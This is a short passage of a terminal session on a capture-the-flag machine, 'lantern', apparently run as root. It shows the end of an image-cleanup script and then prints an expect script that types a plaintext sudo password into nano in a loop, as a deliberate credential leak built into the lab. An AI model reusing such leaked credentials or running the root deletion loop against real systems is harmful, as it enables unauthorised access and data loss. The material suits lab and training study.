EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}")
EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1}  # Remove leading '|'

# Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images
/usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do
    /bin/rm -f "$file"
done

/usr/sbin/service blazor-server restart
root@lantern:~# file bot.exp
bot.exp: a /usr/bin/expect -f script, ASCII text executable
root@lantern:~# cat bot.exp
#!/usr/bin/expect -f

spawn nano /root/automation.sh

set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"

while {1} {
    foreach char [split $text ""] {
        send "$char"
        sleep 1
    }

    send "\r"

    sleep 0.5

    for {set i 0} {$i < [string length $text]} {incr i} {
        send "\b \b"  ;
    }

    send "\r"
}
